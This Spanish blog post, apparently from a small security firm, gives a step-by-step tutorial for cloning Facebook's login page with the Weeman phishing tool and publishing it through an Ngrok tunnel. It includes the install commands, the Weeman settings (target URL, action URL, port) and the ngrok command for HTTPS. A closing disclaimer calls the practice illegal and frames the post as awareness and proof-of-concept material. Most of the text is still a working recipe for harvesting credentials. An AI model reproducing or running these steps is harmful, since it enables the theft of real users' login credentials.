Pescando en Facebook

weeman


Con todo el revuelo que hay hoy en día con Facebook tenemos que recordar que hay gente que se aprovecha de la desorientación general que están teniendo lo usuarios de esta red social tan usada.
Hay gente que con un poco de ingeniería social están aprovechando para robar los credenciales de acceso a Facebook usando todas las artimañas posibles casi indetectables incluso para expertos.

Esta vez vamos a usar dos aplicaciones, la ya conocida Ngrok para compartir nuestro servidor local en internet y Weeman que es la aplicación que creará y gestionará nuestro phishing.

Qué es Weeman

Weeman es la aplicación que en este caso se va a encargar de montar y gestionar el phishing que vamos a crear, como siempre para instalar la aplicación lo que haremos es clonar desde el repositorio del desarrollador en GitHub. Hay que tener en cuenta que para que la aplicación corra necesitamos tener instalado python 2.7 en nuestro ordenador.
Una vez clonada la aplicación tenemos que instalar una dependencia para su correcto funcionamiento:
sudo pip install -r beautifulsoup4
Una vez instalada la dependencia probamos si funciona correctamente la aplicación lanzandola. Para ello nos desplazamos hasta la carpeta de la aplicación a través de nuestra consola y ponemos lo siguiente:
python weeman.py

weeman intro

Una vez instalado procederemos a crear nuestro phishing, con weeman abierto ponemos el comando "show". Con weeman abierto abrimos una pestaña nueva en nuestro terminal y lanzamos ngrok.

show

Una vez hecho esos dos pasos en la consola de weeman ponemos lo siguiente para que copiemos nuestro phishing de Facebook y lo subamos a ngrok.
set url https://facebook.com
set action_url xx_ngrok.io
set port 8080
run 
Quedará algo así:

set run weeman


Donde xxx_ngrok.io es la url que nos dará Ngrok para hacer el tunel entre nuestro servidor local e internet. Si queremos que ngrok trabaje en https tan sólo tenemos que ponerle en la pestaña donde tenemos ngrok lo siguiente:
ngrok http bind-tls=true 8080

Si todo ha ido bien tendremos nuestro phishing preparado y subido a internet.

Debemos de tener en cuenta que estas prácticas son ilegales, el objetivo de este post es concienciar demostrando como de una manera tan sencilla alguien que realmente quiera hacer mal puede usar estas técnicas y estos programas que públicamente están en repositorios de internet para conseguir la única finalidad de robar los credenciales de los usuarios de esta u otra red social.
Este tipo de prácticas única y exclusivamente se tienen que usar como pruebas de concepto y en entornos totalmente controlados.

Recordar que estamos abiertos a todo tipo de correcciones.

Para más info puedes consultarnos en nuestro email info@rekat.es o a través de nuestra página web https://rekat.es

También estamos disponibles tanto por Facebook como por Twitter

Saludos! 👾

Comentarios

Entradas populares de este blog

Fotografía forense con Fotoforensics

Acediendo a nuestra web con ProFTPD

Instalación de Faraday IDE